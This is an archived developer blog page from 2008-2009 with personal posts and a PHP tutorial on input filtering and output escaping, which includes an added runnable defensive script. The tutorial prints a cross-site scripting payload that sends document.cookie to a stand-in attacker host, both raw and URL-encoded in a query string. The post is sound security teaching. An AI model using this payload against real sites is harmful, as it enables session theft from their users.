Jun 4 2009

I’ve started giving Netbeans for PHP a try, considering everyone is saying how much better it is than Eclipse PDT. So far I’m very impressed at its simplicity and ease of use – which for the main tool a programmer uses day in and day out for at least 8 hours, is a very good thing.

However I came across a couple of “issues” or teething problems rather, that thankfully with a short Google (sorry Bing…), I managed to find solutions for…


Mar 24 2009

Many people across the world have made this pledge:

I will publish a blog post on Tuesday 24th March about a woman in technology whom I admire but only if 1,000 other people will do the same.

Here is mine, and although I didn’t have to think very hard about who to post about, I still admire her more than anyone in the world.

Hannah is 39 weeks and 1 day pregnant today, and she’s still working hard at Netbasic. She’s not exactly a pro programmer, but she’s learning so quickly. From knowing nothing at all about HTML or CSS or Photoshop, she’s come forwards in leaps and bounds with the help of everyone here. It’s certainly not easy for her, she gets aches and pains all day, Braxton Hicks contractions, extremely painful kicks, and all sorts. She’s under the weather, tired and very drained, yet somehow she is carrying on, she’s still working hard and creating pages that are helping keep the company going!

I suppose this is just my way of saying how proud I am of her, and how awesome she is.

Jan 29 2009

I’m currently working on cleaning up the sanitisation and validation libraries in our homegrown framework at Netbasic here, and I was given an excerpt from the Php|architect’s Zend PHP 5 Certification Study Guide – the Security chapter. The summary section really outlines a key point you should always bear in mind when writing any PHP code… filter input, escape output.

Filtering input is important, and it is recommended to do this using a “white list” approach – i.e. you specify a valid choice of values for a particular field – if it does not match then discard it. Consider this:

// Example 1
$value = $_GET["colour"];
echo "Your favourite colour is {$value}";

This first example shows lack of filtering. Potentially, as the study guide shows, the colour could be overridden and set to be:

<script>
document.location = 'http://myhackingsite.com/getcookies.php?cookies=' + document.cookie;
</script>

This small piece of JavaScript would then pick up people’s cookies. Let’s look at the second example…

// Example 2
$value = "white";
$valid_colours = array("red","green","blue");
if(in_array($_GET["colour"], $valid_colours))
{
  $value = $_GET["colour"];
}
echo "Your favourite colour is {$value}";

This piece of code is much safer (although not totally secure…). $value has been initialised. Although I ensure register_globals = Off where possible, there may be some hosts that have register_globals On. The “colour” $_GET value is checked against a white list, and if it does not match, it is not assigned. If $value is not initialised and register_globals was On, then someone could pass a query such as:

http://mywebsite.com/example.php?colour=notacolour&value=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2Fmyhackingsite.com%2Fgetcookies.php%3Fcookies%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E

What would happen is that the “colour” argument would not match the white list, but value would be initialised with the above piece of cookie-collecting Javascript. An even safer version of this code is with escaped output:

// Example 3
$value = "white";
$valid_colours = array("red","green","blue");
if(in_array($_GET["colour"], $valid_colours))
{
  $value = $_GET["colour"];
}
$value = htmlentities($value);
echo "Your favourite colour is {$value}";

Even with register_globals On and $value uninitialised, the end user will just see the JavaScript source as text, rather than the browser executing it.

Don’t forget, output isn’t limited to just outputting to the browser through echo or print – you need to think about storing data, such as in MySQL databases or in files. Escaping is specific to the output context: HTML escaping does nothing to protect a SQL query, and vice versa. Thankfully, PHP provides database-specific escaping functions, such as mysql_real_escape_string.
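Here is the filter-input / escape-output pattern from the three examples above pulled together into one runnable script, covering the cases the post discusses (a valid colour, a value outside the white list, the script payload, and the register_globals-style “value=” override) plus two a practitioner would also check (a missing parameter and colour[]=… sent as an array). This is an added example, not code from the post or the study guide; the function names, the constructed test cases and the PDO storage function are mine, and it assumes PHP 7 or later.

```php
<?php
// Added example (not from the original post): whitelist the input once,
// then escape at every output point for the context it is emitted into.
// Function names, constants and the constructed cases below are assumptions
// made for this illustration; the "colour" parameter and the cookie-stealing
// payload are the ones discussed in the post.

declare(strict_types=1);

const VALID_COLOURS  = ['red', 'green', 'blue'];
const DEFAULT_COLOUR = 'white';

/**
 * Whitelist filter. Returns one of VALID_COLOURS or the default.
 *  - The result is always initialised here, so a register_globals-style
 *    "value=" parameter can never pre-populate it.
 *  - in_array() is called in strict mode so only an exact string matches.
 *  - A missing or non-string parameter (e.g. colour[]=red) is rejected
 *    instead of raising a notice or passing an array through.
 */
function filterColour(array $get): string
{
    $candidate = $get['colour'] ?? null;
    if (is_string($candidate) && in_array($candidate, VALID_COLOURS, true)) {
        return $candidate;
    }
    return DEFAULT_COLOUR;
}

/**
 * Escape for an HTML text node or a double-quoted HTML attribute.
 * ENT_QUOTES escapes both quote characters (the PHP 5 default for
 * htmlentities(), ENT_COMPAT, leaves single quotes alone, which matters
 * inside attributes); the explicit charset avoids encoding mismatches.
 */
function escapeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

/**
 * Render the fragment: filter once, escape at each of the two output points
 * (attribute value and text node).
 */
function renderColourPage(array $get): string
{
    $safe = escapeHtml(filterColour($get));
    return "<p class=\"{$safe}\">Your favourite colour is {$safe}</p>";
}

/**
 * SQL is a different output context. Bind the value instead of building the
 * query string by hand; mysql_real_escape_string() from the post belongs to
 * the legacy mysql extension, which PHP 7 removed.
 */
function storeColour(PDO $db, string $colour): void
{
    $stmt = $db->prepare('INSERT INTO favourites (colour) VALUES (:colour)');
    $stmt->execute([':colour' => $colour]);
}

// --- demonstration with constructed input --------------------------------

// The payload from the post, as PHP would present it in $_GET after URL decoding.
$payload = "<script>document.location = 'http://myhackingsite.com/getcookies.php?cookies=' + document.cookie;</script>";

$cases = [
    'valid'            => ['colour' => 'blue'],
    'missing'          => [],
    'not in whitelist' => ['colour' => 'notacolour'],
    'script payload'   => ['colour' => $payload],
    'array parameter'  => ['colour' => ['red']],
    // register_globals-style attempt: colour fails the whitelist and the
    // attacker also sends value=<payload>; it is never read.
    'value override'   => ['colour' => 'notacolour', 'value' => $payload],
];

foreach ($cases as $label => $get) {
    echo str_pad($label, 18), ' => ', renderColourPage($get), "\n";
}

// Same filtered value written to a database through a bound parameter
// (in-memory SQLite so the script runs offline).
if (extension_loaded('pdo_sqlite')) {
    $db = new PDO('sqlite::memory:');
    $db->exec('CREATE TABLE favourites (colour TEXT)');
    storeColour($db, filterColour(['colour' => $payload]));
    echo 'stored: ', $db->query('SELECT colour FROM favourites')->fetchColumn(), "\n";
}
```

Note the two design choices that go beyond the post’s Example 3: the escaping function is htmlspecialchars() with ENT_QUOTES rather than htmlentities() with its defaults, because the same value is also emitted inside an attribute, and the database write uses a prepared statement, which sidesteps escaping for that context altogether.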

There’s much more to this than just what I’ve explained, and the study guide goes into a bit more depth. I recommend you pick up a copy and read it, even if you’re not studying for a Zend certification.

Oct 6 2008

Well, it’s Monday morning again, I’m back at work, and Chris has given me some kind of lung death throat destroying illness. I’ve sorted through the barrage of spam e-mail and general rubbish that arrived in my Inbox over the weekend, revealing that there are actually no e-mails worth reading.

I’m not the only one who is ill though. Chris was the originator, and he’s passed it on to Sii, Jon and myself. In turn I’ve passed it on to Hannah, and it’s likely Jon has passed it on to Jake as he had a lift this morning. What makes this worse is that in a matter of minutes we’ll all be going into our weekly meeting and spreading the lung death throat destroying illness even further.

Sep 29 2008

This morning the office here at Netbasic was greeted with the good news that we made it to position 3 in The Sunday Times Microsoft Tech Track 100 for 2008.

The Tech Track 100 is published annually and ranks Britain’s fastest-growing private tech companies over the last three years. Netbasic started in 2003 and in 2004 the company made £255,000 in sales, which grew at an average of 235% a year to £9.6 million in 2007.

This huge increase makes Netbasic rank at number 3, just below Lovefilm International, which in my eyes is a damn good feat!